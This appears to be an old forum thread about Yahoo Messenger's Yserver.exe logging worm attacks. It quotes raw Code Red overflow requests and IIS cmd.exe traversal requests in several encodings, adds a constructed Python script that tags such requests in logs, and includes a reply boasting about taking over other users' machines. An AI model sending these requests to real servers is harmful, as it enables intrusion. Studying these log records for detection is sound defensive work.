Not a trick but proves Yahoo sucks


  • Not a trick but proves Yahoo sucks

    In the recent build of Yahoo Messenger there is a pretty big flaw. When you first open it, it runs a file called Yserver.exe, which in turn announces to the internet that your computer is a server. This doesn't sound too bad, but since hundreds if not thousands of computers are infected with worms, they will try to attack your computer as well. You can see evidence of this by opening your YServer.log file (C:/Program Files/Yahoo!/Messenger/Yserver.log) in Notepad. The following describes what the attacks look like:
    Code red worm: IP from = 218.49.232.235
    02/17/102 23:00:16.820 02/17/102 23:00:17.310 00:00:00.490 218.49.232.235 Get text/plain /default.ida -1 0 .ida GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%u cbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b %u53ff%u0078%u0000%u00=a HTTP/1.0
    Content-type: text/xml
    HOST:www.worm.com
    Accept: */*
    Content-length: 3569

    IIS Attacks: IP from = 66.44.12.141 and 66.68.68.238
    02/25/102 13:31:58.740 02/25/102 13:31:58.740 00:00:00.000 66.44.12.141 Get application/x-msdownload /scripts/root.exe -1 0 .exe GET /scripts/root.exe?/c+dir HTTP/1.0
    Host: www
    Connnection: close


    02/25/102 13:32:07.640 02/25/102 13:32:08.190 00:00:00.550 66.44.12.141 Get application/x-msdownload /MSADC/root.exe -1 0 .exe GET /MSADC/root.exe?/c+dir HTTP/1.0
    Host: www
    Connnection: close


    02/25/102 13:32:17.800 02/25/102 13:32:18.300 00:00:00.500 66.44.12.141 Get application/x-msdownload /c/winnt/system32/cmd.exe -1 0 .exe GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
    Host: www
    Connnection: close


    02/25/102 17:03:10.660 02/25/102 17:03:11.150 00:00:00.490 66.68.68.238 Get application/x-msdownload /scripts/root.exe -1 0 .exe GET /scripts/root.exe?/c+dir HTTP/1.0
    Host: www
    Connnection: close


    02/25/102 17:03:11.760 02/25/102 17:03:12.250 00:00:00.490 66.68.68.238 Get application/x-msdownload /MSADC/root.exe -1 0 .exe GET /MSADC/root.exe?/c+dir HTTP/1.0
    Host: www
    Connnection: close


    02/25/102 17:03:12.860 02/25/102 17:03:13.350 00:00:00.490 66.68.68.238 Get application/x-msdownload /c/winnt/system32/cmd.exe -1 0 .exe GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
    Host: www
    Connnection: close


    02/25/102 17:03:13.950 02/25/102 17:03:14.450 00:00:00.500 66.68.68.238 Get application/x-msdownload /d/winnt/system32/cmd.exe -1 0 .exe GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
    Host: www
    Connnection: close


    02/25/102 17:03:15.050 02/25/102 17:03:15.550 00:00:00.500 66.68.68.238 Get application/x-msdownload /scripts/..%255c../winnt/system32/cmd.exe -1 0 .exe GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
    Host: www
    Connnection: close


    02/25/102 17:03:16.210 02/25/102 17:03:16.700 00:00:00.490 66.68.68.238 Get application/x-msdownload /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe -1 0 .exe GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
    Host: www
    Connnection: close


    02/25/102 17:03:17.300 02/25/102 17:03:17.800 00:00:00.500 66.68.68.238 Get application/x-msdownload /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe -1 0 .exe GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
    Host: www
    Connnection: close


    02/25/102 17:03:18.350 02/25/102 17:03:18.840 00:00:00.490 66.68.68.238 Get application/x-msdownload /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe -1 0 .exe GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
    Host: www
    Connnection: close


    02/25/102 17:03:19.450 02/25/102 17:03:19.940 00:00:00.490 66.68.68.238 Get application/x-msdownload /scripts/..%c1%1c../winnt/system32/cmd.exe -1 0 .exe GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
    Host: www
    Connnection: close


    02/25/102 17:03:20.490 02/25/102 17:03:21.040 00:00:00.550 66.68.68.238 Get application/x-msdownload /scripts/..%c0%2f../winnt/system32/cmd.exe -1 0 .exe GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
    Host: www
    Connnection: close


    02/25/102 17:03:21.590 02/25/102 17:03:22.080 00:00:00.490 66.68.68.238 Get application/x-msdownload /scripts/..%c0%af../winnt/system32/cmd.exe -1 0 .exe GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
    Host: www
    Connnection: close


    02/25/102 17:03:22.630 02/25/102 17:03:23.130 00:00:00.500 66.68.68.238 Get application/x-msdownload /scripts/..%c1%9c../winnt/system32/cmd.exe -1 0 .exe GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
    Host: www
    Connnection: close


    02/25/102 17:03:23.730 02/25/102 17:03:24.220 00:00:00.490 66.68.68.238 Get application/x-msdownload /scripts/..%%35%63../winnt/system32/cmd.exe -1 0 .exe GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
    Host: www
    Connnection: close


    02/25/102 17:03:24.830 02/25/102 17:03:25.320 00:00:00.490 66.68.68.238 Get application/x-msdownload /scripts/..%%35c../winnt/system32/cmd.exe -1 0 .exe GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
    Host: www
    Connnection: close


    02/25/102 17:03:25.870 02/25/102 17:03:26.370 00:00:00.500 66.68.68.238 Get application/x-msdownload /scripts/..%25%35%63../winnt/system32/cmd.exe -1 0 .exe GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
    Host: www
    Connnection: close


    02/25/102 17:03:26.920 02/25/102 17:03:27.470 00:00:00.550 66.68.68.238 Get application/x-msdownload /scripts/..%252f../winnt/system32/cmd.exe -1 0 .exe GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
    Host: www
    Connnection: close

    Luckily, this isn't harmful to most of you since you don't use a server at home, but there is probably a way to exploit this for other uses. By the way, if you want to find out where the attacking IP is located, go to http://visualroute.visualware.com/, type the IP in the box, and push enter. I even had one attack coming from some apartment place in Plano, Texas.
    Normality is the playground of the unimaginative.
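
Added example, not part of the original post: a small triage script for log entries in the layout quoted above. It decodes each requested path until it stops changing, so the many encodings of the same traversal collapse to one form, then tags the request per source IP. The function names, tag names and sample lines are constructed for illustration.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_to_bytes

# Fields: start date/time, end date/time, duration, client IP, method, MIME, path.
ENTRY = re.compile(r"^(?:\S+ ){5}(\d{1,3}(?:\.\d{1,3}){3}) \S+ \S+ (\S+) ")

def normalize(path, max_rounds=4):
    """Percent-decode until stable, then fold 0xC0/0xC1 two-byte forms to ASCII."""
    raw = path.encode("latin-1")
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        raw = decoded
    out, i = bytearray(), 0
    while i < len(raw):
        # Assumption: model a lenient decoder that keeps only the low six bits.
        lenient = raw[i] in (0xC0, 0xC1) and i + 1 < len(raw)
        out.append(((raw[i] & 0x1F) << 6) | (raw[i + 1] & 0x3F) if lenient else raw[i])
        i += 2 if lenient else 1
    return out.decode("latin-1").replace("\\", "/").lower()

def classify(path):
    norm, tags = normalize(path), []
    if norm.endswith(".ida"):
        tags.append("ida-request")
    if norm.endswith(("/root.exe", "/cmd.exe")):
        tags.append("shell-binary-request")
    if "/../" in norm and "/../" not in path:
        tags.append("obfuscated-traversal")  # traversal visible only after decoding
    return tags

def summarize(log_text):
    hits = defaultdict(Counter)  # client IP -> tag counts; untagged requests omitted
    for line in log_text.splitlines():
        m = ENTRY.match(line.strip())
        if m and (tags := classify(m.group(2))):
            hits[m.group(1)].update(tags)
    return dict(hits)

# Constructed sample in the post's log layout; IPs are documentation ranges.
PFX = "02/25/102 17:03:10.660 02/25/102 17:03:11.150 00:00:00.490 "
SAMPLE = "\n".join(PFX + rest for rest in [
    "192.0.2.10 Get text/plain /default.ida -1 0 .ida GET /default.ida?NNNN HTTP/1.0",
    "198.51.100.7 Get application/x-msdownload /scripts/root.exe -1 0 .exe GET /scripts/root.exe?/c+dir HTTP/1.0",
    "198.51.100.7 Get application/x-msdownload /scripts/..%255c../winnt/system32/cmd.exe -1 0 .exe GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "198.51.100.7 Get application/x-msdownload /scripts/..%c0%af../winnt/system32/cmd.exe -1 0 .exe GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "192.0.2.55 Get text/html /index.html -1 0 .html GET /index.html HTTP/1.0",
])
```

Calling `summarize()` on the text of a log file returns the tag counts per client address; header lines such as `Host: www` do not match the entry pattern and are skipped.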

  • #2
    hit ctrl+alt+del and close Yserver. Messenger still stays on but the worm is gone
    Sinister69 - Need I Say More..
    www.Fucking-Yahoo.com - Didnt Think So..



    • #3
      worm dis!

      w0rm my ass ... if u guys dunno wat it is dont hype it up

      limp & mike u wanna talk bout it come over see me dogg and rob

      Windows IP Configuration
      Ethernet adapter Local Area Connection:
      Connection-specific DNS Suffix . : midsouth.rr.com
      IP Address. . . . . . . . . . . . : 24.165.145.32
      Subnet Mask . . . . . . . . . . . : 255.255.252.0
      Default Gateway . . . . . . . . . : 24.165.144.1



      • #4
        ..

        wtf r u guys talking bout? i can't understand ANYTHING u guyz r say'n
        lzicl



        • #5
          they r talkin bout how to make a pie
          °·.·.·.·°DaNieL™°·.·.·.·°



          • #6
            we all knew yahoo sucked a long time ago

            it's not new news to hear that yahoo sux we all knew this for the longest time but you are right this proves they extra suclz
            :-X love ya forever and always



            • #7
              damn

              you all hardcore up on this subject limpy why such a strong opinion? if i may ask *Hides in corner *
              :-X love ya forever and always



              • #8
                lol funny talking about yserver.exe lol lmfao do some real stuff sniff the data with commview and then you can see the real packets :-D www.commview.com get the shareware lol
                My New Alias: Khaotic_Silence - Location: Yahoo! Messenger



                • #9
                  lol...guys...ANY SERVER file can be used to trojan..once you have the server on your pc it opens a port up which can be exploited with certain trojans or certain worms.... if any1 want to know.. believe me if u want...but eh...some will know this is true
                  [gl]HACKERS WEBSITE[/gl]



                  • #10
                    Shut the fock up $mev, i have a comp as server and i use Yahoo Messenger, i never got a problem , FOCK UP damn newbies!



                    • #11
                      Pascal... u child.. this post was ages ago.. and u obviously know $hit... yes, a server carries. As limp said u fricking idiot "Which could mean nothing at all, or could mean something." READ BEFORE YOU MOUTH OFF.. and what am I a newbie to? Ur a newbie to this site, I've been on yahoo longer than you, I've probably been living longer than you... who's a newbie? THINK BEFORE YOU SPEAK FRENCHIE.. and btw.. I know who u are
                      [gl]HACKERS WEBSITE[/gl]



                      • #12
                        *points and laughs at pascal*
                        "Dad, what's the blow-hole for?"
                        "I'll tell you what it's not for, son. And when I do, you'll understand why I can never go back to Sea World."



                        • #13
                          Oh $vev man ! tell me the name of the TROJAN than u speak a lot,
                          no response ???
                          U GET PISSED LOL



                          • #14
                            Smev isn't lying... There is a server file... It has something to do with the yahoo updater ... I'm such a pimp.. Smev it is highly vulnerable being something new.... And yes you can overflow and control other machines with this server file....The extent i have been able to use it is yahoo options only.. I haven't been able to get outta others messengers... and into other files on their comp... in time..I should have spent more time with altering trojans hehehe.. cuz all i doing is altering a server file here hehehe.....Who should i completely own once i learn?



                            • #15
                              pascal it is NOT a trojan merely a way for yahoo to connect to your comp and update or tell you there is an update...
